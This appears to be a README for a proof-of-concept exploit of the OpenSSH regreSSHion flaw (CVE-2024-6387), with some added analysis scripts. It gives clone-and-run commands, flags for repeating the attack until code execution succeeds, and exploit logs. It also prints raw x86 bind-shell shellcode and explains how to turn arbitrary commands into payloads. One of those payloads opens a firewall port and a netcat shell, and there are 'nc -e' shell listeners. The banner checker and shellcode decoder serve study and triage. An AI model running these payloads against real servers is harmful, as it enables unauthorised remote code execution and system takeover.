Proof-of-concept Python script for the regreSSHion (CVE-2024-6387) exploit. Version 0.2.1 build POC
git clone https://github.com/l-urk/CVE-2024-6387.git
cd CVE-2024-6387
pip3 install -r requirements.txt
python3 regreSSHion.py -h
🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script
usage: regreSSHion.py [-h] -i IP -p PORT [-t] [-c] [-d] [-r] [-x] [-y] [-z]
🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script
options:
-h, --help show this help message and exit
-i IP, --ip IP target SSH server IPv4 ( format: -i 0.0.0.0 )
-p PORT, --port PORT target SSH server port number ( format: -p 22 )
-t, --time ENABLE TIME displayed on all log output ( format: -t )
-c, --clear CLEAR SCREEN before running the exploit ( format: -c )
-d, --debug enable see the DEBUG LOGS output on run ( format: -d )
-r, --repeat enable to REPEAT EXPLOIT until RCE wins ( format: -r )
-x, --skipssh enable this to SKIP SSH HANDSHAKES ( format: -x )
-y, --skipheap enable this to SKIP HEAP and parse ( format: -y )
-z, --skipfinal enable this to SKIP FINAL ID CHECK ( format: -z )
🔒 Affected OpenSSH Versions: < 4.4p1 (unless backport-patched for CVE-2006-5051 / CVE-2008-4109) and 8.5p1 ~ 9.7p1 (fixed in 9.8p1)
🔒 contact: github.com/l-urk - x.com/l_urkk
To use the script, run it with python3 and point it at the target:
- Set --ip to the vulnerable SSH server's IPv4 address
- Set --port to the vulnerable SSH server's port number
python3 regreSSHion.py --ip 127.0.0.1 --port 22
2024-08-03 22:42:55,944 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:42:55,945 - INFOS - Connection established
2024-08-03 22:42:55,945 - INFOS - Performing SSH handshake...
2024-08-03 22:43:05,014 - INFOS - Received KEX_INIT (5 bytes)
2024-08-03 22:43:05,015 - INFOS - SSH handshake successful.
2024-08-03 22:43:05,015 - INFOS - Preparing heap...
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 1
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 2
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 3
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 4
Assume the run gets all the way to this point (the intermediate heap-preparation lines are omitted here):
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 3
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 4
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 5
2024-08-03 22:46:45,858 - INFOS - Sent large string
2024-08-03 22:46:45,858 - INFOS - Heap preparation complete.
2024-08-03 22:47:05,879 - INFOS - Estimated parsing time: 0.000056 seconds
2024-08-03 22:47:05,880 - INFOS - Final packet sent successfully.
2024-08-03 22:47:05,880 - INFOS - Verifying exploit success.
2024-08-03 22:47:15,890 - WARN! - No response received for verification.
2024-08-03 22:47:15,891 - ERROR - Exploitation failed.
If the log instead reports that exploit verification succeeded, the payload was delivered and executed. The script retries a few times before giving up (use -r to keep repeating until it succeeds). I would suggest trying this on your own vulnerable SSH server until you get a feel for what a successful run looks like. Keep in mind that the underlying bug is a signal-handler race, so failure is the normal outcome of any single attempt: in the Qualys write-up a successful exploitation took on the order of 10,000 attempts (6 to 8 hours) against a 32-bit Debian target, so one failed verification says nothing about whether the host is patched.
Debug mode
- With debug mode enabled you get more verbose output: the received SSH version string, packet length information, and essentially everything else that can be logged.
python3 regreSSHion.py --ip 127.0.0.1 --port 22 --debug
Example Output:
2024-08-03 22:44:53,962 - DEBUG - Logging is set to DEBUG level
2024-08-03 22:44:53,962 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:44:53,963 - INFOS - Connection established
2024-08-03 22:44:53,963 - INFOS - Performing SSH handshake...
2024-08-03 22:44:53,963 - DEBUG - Sent SSH version string.
2024-08-03 22:44:53,963 - DEBUG - Waiting to receive SSH version string
2024-08-03 22:45:03,256 - DEBUG - Received SSH version string: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
2024-08-03 22:45:04,373 - INFOS - Received KEX_INIT (4 bytes)
2024-08-03 22:45:04,373 - INFOS - SSH handshake successful.
2024-08-03 22:45:04,373 - INFOS - Preparing heap...
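As a quick triage step before running the exploit, the banner that debug mode prints can be checked against the affected ranges. The following is an added example, not code from the l-urk repository: the ranges are those in the Qualys advisory (portable OpenSSH before 4.4p1, and 8.5p1 up to but not including 9.8p1), the banner strings in the main block are constructed samples, and the function names are my own. It judges only the upstream version number. Ubuntu, for instance, backported the fix into its 8.9p1 packages for 22.04 without changing that number, so the banner from the run above identifies a candidate, not a confirmed vulnerable host.

```python
import re

# Affected upstream ranges per the Qualys regreSSHion advisory (an assumption
# of this example, not something the script checks): portable OpenSSH before
# 4.4p1, unless backport-patched for CVE-2006-5051/CVE-2008-4109, and 8.5p1 up
# to but not including 9.8p1. Non-portable (OpenBSD) builds are not affected.
BANNER_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)(?:p(\d+))?(?:\s+(\S.*))?")


def parse_banner(banner):
    """Split an SSH identification string into ((major, minor, portable), vendor_suffix).

    'SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1' -> ((8, 9, 1), 'Ubuntu-3ubuntu0.1')
    portable is None when there is no pN suffix; returns None for non-OpenSSH banners.
    """
    m = BANNER_RE.search(banner.strip())
    if not m:
        return None
    major, minor, portable, suffix = m.groups()
    ver = (int(major), int(minor), int(portable) if portable is not None else None)
    return ver, (suffix or "")


def classify(banner):
    """'affected', 'not-affected' or 'unknown', judged on the upstream version only.

    A distro suffix such as 'Ubuntu-3ubuntu0.N' may carry a backported fix that
    this check cannot see, so 'affected' means 'candidate', not 'confirmed'.
    """
    parsed = parse_banner(banner)
    if parsed is None:
        return "unknown"
    (major, minor, portable), _suffix = parsed
    if portable is None:
        # No pN suffix: a non-portable OpenBSD build, whose syslog_r() is
        # async-signal-safe; Qualys reports OpenBSD as not affected.
        return "not-affected"
    ver = (major, minor)
    if ver < (4, 4) or (8, 5) <= ver < (9, 8):
        return "affected"
    return "not-affected"


if __name__ == "__main__":
    # Constructed sample banners; the first is the one from the debug run above.
    for b in ("SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1",
              "SSH-2.0-OpenSSH_9.8p1",
              "SSH-2.0-OpenSSH_7.4p1",
              "SSH-2.0-OpenSSH_4.3p2 Debian-9",
              "SSH-2.0-dropbear_2022.83"):
        print(f"{b:45} {classify(b)}")
```

Run it with the banner the target returned; anything other than "affected" is not worth spending exploit attempts on, and "affected" still needs the distro's changelog checked before you trust it.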
The default shellcode is raw machine code for 32-bit x86 Linux (int 0x80 syscalls), not a shell command. Decoded, it calls socket(), bind()s the socket to 127.0.0.1:9999, then listen(), accept(), dup2()s the accepted descriptor over stdin/stdout/stderr and execve()s /bin//sh. In other words it is a bind shell on port 9999, but bound to the loopback address only, so it is reachable only from the target host itself; the bytes contain no ufw or nc invocation and open nothing in the firewall. Because it uses 32-bit registers and the int 0x80 entry point it is meant for a 32-bit sshd, which is also the only configuration in which Qualys demonstrated the bug being exploitable.
shellcode = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\x7f\x00\x00\x01\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x56\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
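To see what the default payload does without trusting a description, the bytes can be decoded. The following is an added example, not code from the repository: it copies the shellcode above byte for byte and pattern-matches the handful of encodings this payload uses (mov al,0x66 / mov bl,N before int 0x80 for socketcall, the push of a sockaddr_in, mov al,0x3f for dup2, mov al,0x0b for execve). The function names are my own, and it is a checker for this payload's idioms, not a general disassembler.

```python
import re
import socket

# The page's default payload, copied byte for byte so the checks run offline.
SHELLCODE = (
    b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x53\x6a\x02\x89\xe1\xcd\x80"
    b"\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\x7f\x00\x00\x01\x66\x68\x27\x0f\x66\x53"
    b"\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80"
    b"\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80"
    b"\xb0\x66\xb3\x05\x56\x56\x89\xe1\xcd\x80"
    b"\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80"
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)

# Linux i386 socketcall() sub-function numbers (the value moved into bl).
SOCKETCALL = {1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept"}

# Encodings this payload uses; the patterns are specific to it, not a general disassembler.
RE_SOCKETCALL = re.compile(rb"\xb0\x66(?:\x31\xdb)?\xb3(.)", re.DOTALL)  # mov al,0x66 ; mov bl,N
RE_SOCKADDR = re.compile(rb"\x68(.{4})\x66\x68(.{2})", re.DOTALL)        # push ip ; push word port
RE_DUP2 = re.compile(rb"\xb0\x3f(?:\xb1.)?\xcd\x80", re.DOTALL)           # mov al,0x3f [; mov cl,N] ; int 0x80
RE_EXECVE_PATH = re.compile(rb"((?:\x68.{4})+)\x89\xe3", re.DOTALL)       # push dword ... ; mov ebx,esp


def printable_strings(data, min_len=4):
    """Runs of printable ASCII, the way the strings(1) tool would report them."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def summarize(sc):
    """Describe the syscalls a payload in this idiom makes and the data it pushes."""
    calls = [SOCKETCALL.get(m.group(1)[0], "?") for m in RE_SOCKETCALL.finditer(sc)]
    addr = RE_SOCKADDR.search(sc)
    sockaddr = None
    if addr:
        sockaddr = (socket.inet_ntoa(addr.group(1)), int.from_bytes(addr.group(2), "big"))
    path = None
    m = RE_EXECVE_PATH.search(sc)
    if m and b"\xb0\x0b\xcd\x80" in sc:           # mov al,0x0b ; int 0x80 is execve
        pushes = m.group(1)
        chunks = [pushes[i + 1:i + 5] for i in range(0, len(pushes), 5)]
        path = b"".join(reversed(chunks)).decode()  # the last push lands at the lowest address
    return {
        "arch": "linux x86 32-bit (int 0x80)" if b"\xcd\x80" in sc else "unknown",
        "socketcalls": calls,
        "sockaddr": sockaddr,
        "dup2_calls": len(RE_DUP2.findall(sc)),
        "execve_path": path,
        "strings": printable_strings(sc),
    }


if __name__ == "__main__":
    for k, v in summarize(SHELLCODE).items():
        print(f"{k:12} {v}")
```

The only printable run of four or more bytes is the pushed "/bin//sh" fragments; there is no "ufw" or "nc" in the payload, and the sockaddr it binds is 127.0.0.1:9999, so nothing outside the host can reach the shell it opens.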
You can also build a payload from a plain-text command with an ASCII-to-hex converter; I use this one: https://www.rapidtables.com/convert/number/ascii-to-hex.html
Be clear about what this produces: \x-escaping a command does not turn it into machine code. The bytes are still the ASCII text of the command, so they only do something if whatever receives them executes text (for example the nc -e /usr/bin/bash listener used for testing below); the raw-syscall shellcode above is the only kind that runs on its own.
- Enter the command text you want to send.
- Choose "User defined" and enter "\x" as the separator.
- Replace all capital X's with lowercase x's (Python accepts either case for the hex digits themselves, but the escape must be \x).
- Use Notepad or any other editor with search-and-replace for this.
- Move the trailing \x from the end of the converter's output to the front, so every byte is prefixed.
- Wrap the result in quotes so it can be pasted as one string literal (the script uses a bytes literal, b"...").
hello world
hello world
"\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"
printf hello world
printf hello world
"\x70\x72\x69\x6E\x74\x66\x20\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"
make test file
test > test
"\x74\x65\x73\x74\x20\x3E\x20\x74\x65\x73\x74"
Allow incoming connections on port 9999 & open a nc shell on port 9999
ufw allow 9999 && /usr/bin/nc -lvp 9999 -e /usr/bin/sh
"\x75\x66\x77\x20\x61\x6C\x6C\x6F\x77\x20\x39\x39\x39\x39\x20\x26\x26\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x6E\x63\x20\x2D\x6C\x76\x70\x20\x39\x39\x39\x39\x20\x2D\x65\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x73\x68"
If you want to test delivery of a payload over a plain TCP socket (no SSH involved) you can use the send_socket.py script. Usage:
usage: send_socket.py [-h] [-i IP] [-p PORT] [-s SHELLCODE]
send shellcode to a target socket (ip and port)
options:
-h, --help show this help message and exit
-i IP, --ip IP target ip address (default: 127.0.0.1)
-p PORT, --port PORT target tcp socket port (default: 1111)
-s SHELLCODE, --shellcode SHELLCODE
shellcode hex to send in format: \x00\x00\x00\...etc (default: F13)
Sender:
python3 send_socket.py -i 127.0.0.1 -p 1111
Listener:
- raw text interpretation (nc just prints whatever bytes arrive)
nc -lvp 1111
- shell execution (nc pipes whatever arrives into bash, so the sent text runs as a command)
nc -lvp 1111 -e /usr/bin/bash
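To make the conversion steps and the send_socket.py test concrete, here is an added example (my code, not the repository's) that encodes a command into the \x form, decodes it back, and delivers it over TCP to a throwaway loopback listener the way send_socket.py and nc -lvp do. The function names are my own, the command is the last one from the conversion examples above, and the listener runs in-process on a port the OS picks, so it needs no other tool running. What it shows is that the bytes that arrive are exactly the command text: a hex-escaped string is a transport encoding, not machine code, and it only does something if the receiver, like nc -e /usr/bin/bash, executes what it reads.

```python
import re
import socket
import threading


def to_hex_escapes(text):
    r"""Encode command text the way the manual steps do: one lowercase \xNN per byte."""
    return "".join(f"\\x{b:02x}" for b in text.encode())


def from_hex_escapes(escaped):
    r"""Decode a \xNN string back to bytes.

    Accepts what the converter emits ('68\x65\x...\x', separator trailing),
    the cleaned-up form ('\x68\x65...'), upper- or lowercase, and optional
    surrounding quotes or a b prefix, so it does not matter whether the
    "move the last \x to the front" step has been done yet.
    """
    s = escaped.strip()
    if s[:1] == "b":
        s = s[1:]
    s = s.strip("\"'")
    return bytes(int(h, 16) for h in re.split(r"\\[xX]", s) if h)


def loopback_roundtrip(payload, timeout=5.0):
    """Send payload to a throwaway listener on 127.0.0.1 and return the bytes it received.

    Stands in for 'python3 send_socket.py -i 127.0.0.1 -p PORT' talking to
    'nc -lvp PORT'; port 0 lets the OS choose a free port, and the listener
    lives in this process so nothing else has to be running.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(timeout)
    port = srv.getsockname()[1]

    def sender():
        with socket.create_connection(("127.0.0.1", port), timeout=timeout) as c:
            c.sendall(payload)

    t = threading.Thread(target=sender, daemon=True)
    t.start()
    received = []
    try:
        conn, _ = srv.accept()
        conn.settimeout(timeout)
        with conn:
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                received.append(chunk)
    finally:
        srv.close()
        t.join(timeout)
    return b"".join(received)


if __name__ == "__main__":
    # Constructed sample: the last command from the conversion examples above.
    cmd = "ufw allow 9999 && /usr/bin/nc -lvp 9999 -e /usr/bin/sh"
    escaped = to_hex_escapes(cmd)
    print(escaped)
    arrived = loopback_roundtrip(from_hex_escapes('"' + escaped + '"'))
    # The listener gets the command text itself, not machine code; only a
    # listener that executes its input (nc -e) will do anything with it.
    print(arrived.decode())
    assert arrived == cmd.encode()
```

Swap the in-process listener for the real "nc -lvp 1111" and you are doing exactly what the Sender/Listener pair above does; with "-e /usr/bin/bash" the same bytes become a command that runs, which is the only sense in which this kind of "shellcode" executes.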